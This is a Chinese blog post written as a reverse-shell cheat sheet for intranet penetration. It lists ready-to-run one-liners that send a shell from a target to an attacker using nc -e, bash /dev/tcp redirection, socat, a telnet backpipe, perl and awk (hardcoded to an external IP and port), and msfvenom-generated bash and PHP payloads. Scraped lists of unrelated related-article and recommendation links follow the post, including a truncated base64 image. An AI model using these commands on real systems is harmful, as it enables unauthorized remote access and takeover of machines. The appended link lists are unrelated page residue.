大年初一,当然是更一篇重磅文章啦

反弹shell

/bin目录下带sh的都是shell

  • nc

    • 1.正向连接,目标机监听自身端口,攻击机主动建立连接

      • 目标机:nc -lvvp 端口 -e /bin/bash (-e cmd.exe)

        • 攻击机:nc -vv 目标IP 监听端口

      • 适用情况:目标机有独立外网ip,攻击机有无都行

    • 2.反向连接,攻击机监听自身端口,目标机主动建立连接

      • 攻击机:nc -lvvp 端口

        • 目标机:nc -vv 攻击机ip 端口 -e /bin/bash

      • 适用情况:攻击机有独立外网ip,目标机在内网,只有一个或多个映射端口

    • 3.聊天/传文件

      • 攻击机:nc -lvvp 端口 < 文件
      • 目标机:nc -vv 攻击机IP 攻击机端口 > 文件

    • 注意:有防火墙会连不上,得找放过的端口

  • bash

    • 攻击机监听:nc -lvvp 端口

      • 目标机:bash -i >& /dev/tcp/攻击机IP/攻击机端口 0>&1

        • 把bash重定向

      • 使用kali下msfvenom生成payload

        • msfvenom -l payloads | grep bash #搜索payload制作命令

        • msfvenom -p cmd/unix/reverse_bash LHOST=攻击机IP LPORT=攻击机端口 #制作payload

          • 目标机运行payload:0<&209-;exec 209<>/dev/tcp/192.168.123.123/12345;sh <&209 >&209 2>&209
          • sh可换成任意一个bash或shell

        • 适用情况:bash -i 被屏蔽,以及nc没有 -e 参数

  • ksh/tsh/zsh/sh

    • 攻击机监听:nc -lvvp 端口

    • 目标机发送

      • ksh -c 'ksh > /dev/tcp/攻击机ip/端口 2>&1

  • socat

    命令最后加个&把进程放到后台
    jobs查看

    • TCP

      • 攻击机监听:socat TCP-LISTEN:端口 -

      • 目标机发送:

        • linux

          • socat exec:'bash -i',pty,stderr,setsid,sigint,sane tcp:攻击机ip:端口

        • windows

          • socat.exe exec:'cmd.exe',pty,stderr,setsid,sigint,sane tcp:攻击机ip:端口

    • UDP

      • 攻击机监听:socat udp-listen:端口 -

      • 目标机发送:

        • linux

          • socat udp-connect:攻击机ip:端口 exec:'bash -i',pty,stderr,sane 2>&1>/dev/null

        • windows

          • socat.exe udp-connect:攻击机ip:端口 exec:'cmd.exe',pty,stderr,sane

  • telnet

    • mknod backpipe p && telnet 攻击机ip 端口 0<backpipe | /bin/bash 1>backpipe

  • perl

    • 攻击机监听

    • 目标机发送

      • 输入msfvenom生成的payload

        • perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"155.94.164.131:10000");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'

  • awk

    • 其他步骤一样,略

      • awk 'BEGIN{s="/inet/tcp/0/155.94.164.131/10000";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'

  • ruby

    • 同上

  • python

    • 攻击机监听

      • nc -lvvp 端口

    • 目标机发送

      • 使用msfvenom生成payload
      • 输入payload

  • java

    • 同上

  • php

    • 生成payload保存到文件中

    • msfvenom -p php/reverse_php lhost=攻击机ip lport=端口 - f php -o /路径/shell.php

      • 复制到目标机运行

  • 使用msfvenom

    • msfvenom -l payloads | grep xxx #搜索可利用payload
    • msfvenom -p 要使用的payload生成脚本 lhost=攻击机ip lport=攻击机端口

内网渗透之跨边界传输 - 反弹shell的更多相关文章

  1. 内网渗透之跨边界传输 - LCX转发

    跨边界转发 端口转发 lcx 流程 目标机 ./lcx -slave 跳板机ip 监听的端口 127.0.0.1 要转发的端口 跳板机(公网) ./lcx -listen 监听的端口 转发给攻击机访问 ...

  2. [源码]Python简易http服务器(内网渗透大文件传输含下载命令)

    Python简易http服务器源码 import SimpleHTTPServerimport SocketServerimport sysPORT = 80if len(sys.argv) != 2 ...

  3. Linux内网渗透

    Linux虽然没有域环境,但是当我们拿到一台Linux 系统权限,难道只进行一下提权,捕获一下敏感信息就结束了吗?显然不只是这样的.本片文章将从拿到一个Linux shell开始,介绍Linux内网渗 ...

  4. metasploit渗透测试笔记(内网渗透篇)

    x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. r ...

  5. Metasploit 内网渗透篇

    0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. ...

  6. 内网渗透之vlunstack靶场

    前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...

  7. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  8. 7.内网渗透之windows认证机制

    文章参考自三好学生域渗透系列文章 看了内网渗透第五篇文章,发现如果想要真正了解PTT,PTH攻击流程,还需要了解windows的认证机制,包括域内的kerberos协议. windows认证机制 在域 ...

  9. 3.内网渗透之reGeorg+Proxifier

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...

随机推荐

  1. android电子书App、自定义图表、仿腾讯漫画App、仿淘宝优惠券、3D选择容器等源码

    Android精选源码 仿支付宝记账本功能,饼状图:数字键盘 android一款功能完善的电子书应用源码 Android自定义图标库,使用方便,扩展性强 android 3D立体无限旋转容器源码 an ...

  2. github简单操作

    配置用户名: git config --global user.name 名.姓 配置用户邮件:git config --global user.email 名.姓@avatarmind.com 查看 ...

  3. 类加载器ClassLoader的理解

    最近在做一个热加载Class的小组件,这个组件需要对类加载器ClassLoader有所了解,我就顺便借这个机会把学到的一点皮毛与大家分享一下. 从Class文件开始 ClassLoader,顾名思义就 ...

  4. MSSS攝影大賽計劃書(第三版)

    比賽內容:對香港的城市風景以及自然風光的攝影 預期成果: 提升同學對香港的認識,鼓勵學生走出大學學園去瞭解香港,同時豐富會員的課餘活動,培養同學的興趣愛好 比賽時間:4月1-15日 最後作品提交時間: ...

  5. Nginx笔记总结十一:Nginx重写规则指南

    依赖PCRE库,需要安装pcre,最多循环10次,超过后返回500错误, 1.       rewrite模块指令 break:完成当前设置的重写规则,停止执行其他的重写规则 if:  if () { ...

  6. 机器学习入门教程-k-近邻

    k-近邻算法原理 像之前提到的那样,机器学习的一个要点就是分类,对于分类来说有许多不同的算法,所谓的物以聚类,分以群分.我们非常的清楚,一个地域的人群,不管在生活习惯,还是在习俗上都是非常相似的,也就 ...

  7. Servlet+JSP 对外访问路径配置

    servlet类似 servlet配置为: <servlet>    <servlet-name>Demo01_OutWrite</servlet-name>    ...

  8. TCP并发、GIL全局锁、多线程讨论

    TCP实现并发 #client客户端 import socket client = socket.socket() client.connect(('127.0.0.1',8080)) while T ...

  9. 5种方法获取url中文件的扩展名

    /** * strrchr - 查找指定字符在字符串中的最后一次出现 * strrpos — 计算指定字符串在目标字符串中最后一次出现的位置 * end — 将数组的内部指针指向最后一个单元 * pa ...

  10. CS229 Lesson 13 高斯混合模型

    课程视频地址:http://open.163.com/special/opencourse/machinelearning.html 课程主页:http://cs229.stanford.edu/ 更 ...